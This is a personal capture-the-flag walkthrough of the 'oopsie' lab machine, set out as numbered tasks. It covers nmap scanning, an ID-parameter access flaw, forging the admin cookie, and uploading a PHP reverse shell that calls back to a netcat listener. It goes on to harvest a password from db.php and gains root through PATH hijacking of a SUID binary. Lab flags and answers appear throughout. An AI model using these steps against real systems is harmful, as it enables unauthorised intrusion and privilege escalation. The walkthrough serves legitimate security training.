# Metadata
IP: 10.129.90.207
Date Accessed: 2/15/2022 11:54AM

# Task 1: What kind of tools can intercept traffic
`proxy`

# Task 2: What is the path to the directory on the webserver that returns a login page? 
Time to get our hands dirty 

## nmap 
`nmap -sC -sV -oN nmap-init $IP`

```
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 61:e4:3f:d4:1e:e2:b2:f1:0d:3c:ed:36:28:36:67:c7 (RSA)
|   256 24:1d:a4:17:d4:e3:2a:9c:90:5c:30:58:8f:60:77:8d (ECDSA)
|_  256 78:03:0e:b4:a1:af:e5:c2:f9:8d:29:05:3e:29:c9:f2 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Welcome
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

```

Looks like we can access the browser

- Access the source code since there is nothing interactable on the main page

- found an admin email

```
<p><i class="fa fa-phone" aria-hidden="true"></i> +44 (0)123 456 789</p>
<p><i class="fa fa-envelope" aria-hidden="true"></i> admin@megacorp.com</p>
```

- Scroll down to see a login page in the source code. Navigate to the page to find a login page

```
http://10.129.90.207/cdn-cgi/login/
```
this is the answer to this task. let's keep pushing

- bruteforcing admin:admin doesn't work. there is a login as guest button, so imma do that

- We got into the guest login page. Weird, the URL said I'm logged in to admin.php
`http://10.129.90.207/cdn-cgi/login/admin.php`

- there is a `uploads` tab. but it said I need super user admin to upload 
`http://10.129.90.207/cdn-cgi/login/admin.php?content=uploads`

- check the source code again because why not
- found an interesting param
`http://10.129.90.207/cdn-cgi/login/admin.php?content=accounts&id=2`

- my next thought is that can I manipulate the id param to make it return as admin . let's try

`http://10.129.90.207/cdn-cgi/login/admin.php?content=accounts&id=1`

- lol guess that works, I am admin now i guess

`
Access ID	Name	Email
34322	admin	admin@megacorp.com`

however, I can't access the uploads page because the cookie is not admin. so let's check the cookie

see what other ID I can find
`http://10.129.90.207/cdn-cgi/login/admin.php?content=accounts&id=4`

I found a john user
8832	john	john@tafcz.co.uk

# Task 3: What can be modified in Firefox to get access to the upload page? 

answer: `cookie`

Inspect element > Storage > Cookie

change the value to the access ID of admin and the name to admin see if that works

Name   Value
role   admin
user   34322



- got in!!! woo

# Task 4: what is the admin access ID
Check task 2: `34322`

# Task 5: On uploading a file, what directory does that file appear in on the server? 

answer: `/uploads`

# Task 6 What is the file that contains the password that is shared with the robert user? 

- Let's try uploading a reverse php shell 
1) Set up a netcat listener
`nc -lvnp 4444`

2) Kali would have php shell ready to use in `/usr/share/webshells/php/php-reverse-shell.php`. Copy this file into your current directory

3) edit line 49 50 of the file to your IP and your nc port

````
$ip = '10.10.14.125';  // CHANGE THIS
$port = 4444;       // CHANGE THIS
````

4) save and upload this file
5) now navigate to the uploads directory to load the php file
6) check your netcat listener
````
Linux oopsie 4.15.0-76-generic #86-Ubuntu SMP Fri Jan 17 17:24:28 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 18:04:51 up 1 min,  0 users,  load average: 0.26, 0.12, 0.04
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ which python
$ which python3
/usr/bin/python3

````

7) stablelize your shell with python3 

`python3 -c "import pty; pty.spawn('/bin/bash')"`

8) check priviledge
````
www-data@oopsie:/$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

````

9) get into the user home

```

www-data@oopsie:/home/robert$ cat user.txt
cat user.txt
f2c74ee8db7983851ab2a96a44eb7981
```

10) catting /etc/passwd show that robert can use bin bash too

`robert:x:1000:1000:robert:/home/robert:/bin/bash`

11) The hint said to check the source code of the pages, so let's do that

````
www-data@oopsie:/var/www/html/cdn-cgi/login$ cat db.php
cat db.php
<?php
$conn = mysqli_connect('localhost','robert','M3g4C0rpUs3r!','garage');
?>
www-data@oopsie:/var/www/html/cdn-cgi/login$ 

````
answer to this task is `db.php`

# Task 7 
LEt's login as Robert now that we have credentials

looks like he's a part of bugtracker group

`````
robert@oopsie:/$ id
id
uid=1000(robert) gid=1000(robert) groups=1000(robert),1001(bugtracker)

`````
- found the bugtracker binary file in /usr/bin, and we have wrx perm on it

use the cmd `find`


# Task 8 Regardless of which user starts running the bugtracker executable, what's user privileges will use to run? 
`root`
we also have the set uid bit set on the perm, that means that the executable will always run as the owner regardless of who runs it. and it's own by root. so if we can run /bin/bash in this binary, we can spawn a root shell >r priv esc

```
-rwsr-xr-- 1 root bugtracker 8792 Jan 25  2020 /usr/bin/bugtracker

```
- run the damn file

```
robert@oopsie:/$ /usr/bin/bugtracker
/usr/bin/bugtracker

------------------
: EV Bug Tracker :
------------------

Provide Bug ID: 2
2  //this is a random number I typed in
---------------

If you connect to a site filezilla will remember the host, the username and the password (optional). The same is true for the site manager. But if a port other than 21 is used the port is saved in .config/filezilla - but the information from this file isn't downloaded again afterwards.

ProblemType: Bug
DistroRelease: Ubuntu 16.10
Package: filezilla 3.15.0.2-1ubuntu1
Uname: Linux 4.5.0-040500rc7-generic x86_64
ApportVersion: 2.20.1-0ubuntu3
Architecture: amd64
CurrentDesktop: Unity
Date: Sat May 7 16:58:57 2016
EcryptfsInUse: Yes
SourcePackage: filezilla
UpgradeStatus: No upgrade log present (probably fresh install)
```
# task 9 What SUID stands for? 

`set owner user id `

# Task 10: What is the name of the executable being called in an insecure manner? 
- I'm trying a text in the input see what it does

```
robert@oopsie:/$ /usr/bin/bugtracker

------------------
: EV Bug Tracker :
------------------

Provide Bug ID: ---------------

cat: /root/reports/------------------: No such file or director

```

- it's calling the cat cmd to root/reports. what if we can change what cat can do, and execute the shell. answer `cat`

# Task 11 User flag
see task 6

# task 12 submit root flag
````
robert@oopsie:/tmp$ echo "/bin/sh" > cat     
echo "/bin/sh" > cat
robert@oopsie:/tmp$ chmod +x cat
chmod +x cat
robert@oopsie:/tmp$ export PATH=/tmp:$PATH
export PATH=/tmp:$PATH
robert@oopsie:/tmp$ bugtracker
bugtracker

------------------
: EV Bug Tracker :
------------------

Provide Bug ID: 2
2
---------------

# id
id
uid=0(root) gid=1000(robert) groups=1000(robert),1001(bugtracker)

# head root/root.txt
head root/root.txt
af13b0bee69f8a877c3faf667f7beacf

````